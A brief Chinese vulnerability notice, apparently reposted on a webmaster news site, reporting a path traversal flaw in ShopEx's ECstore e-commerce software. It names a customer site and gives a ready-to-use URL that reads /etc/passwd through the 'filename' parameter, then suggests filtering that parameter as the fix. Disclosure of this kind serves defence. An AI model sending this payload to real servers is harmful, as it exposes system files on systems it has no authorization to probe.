ShopE旗下产品ECstore任意文件遍历漏洞下载

ShopE旗下产品ECstore任意文件遍历漏洞

官方主站:http://ecstore.shopex.cn/在官方宣传上有成功案例:

http://mall.brands.com.tw/ec

http://mall.brands.com.tw/ec/index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd

修复方案:

对filename进行过滤

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细